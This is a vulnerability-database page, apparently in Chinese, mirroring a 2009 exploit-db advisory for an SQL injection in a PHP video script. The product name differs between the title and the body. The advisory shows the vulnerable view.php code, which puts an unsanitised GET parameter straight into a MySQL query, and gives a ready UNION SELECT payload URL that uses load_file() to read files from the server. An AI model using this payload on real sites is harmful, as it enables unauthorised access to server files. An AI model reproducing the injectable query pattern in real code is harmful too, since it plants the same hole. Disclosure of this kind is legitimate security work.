SurfMyTV Script 1.0 - 'view.php?id' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057595 漏洞类型
发布时间 2009-03-24 更新时间 2009-03-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8282
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#########################################################################################
[0x01] Informations:
Name           : Media Entertainment Script 1.0
Download       : http://www.hotscripts.com/listings/jump/download/89424/
Vulnerability  : Sql Injection To Lfi
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud To Be Italian
Greetz         : //
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/view.php
[code]
$id  = $_GET['id'];
$v = mysql_fetch_array(mysql_query("SELECT id,views,title FROM videos WHERE id='$id'"));
[/code]
#########################################################################################
[0x03] Exploit:
1- http://victim.it/path/view.php?id=-1' union select 0,0,0,load_file('lf'),0,0,0--
########################################################################################

# milw0rm.com [2009-03-24]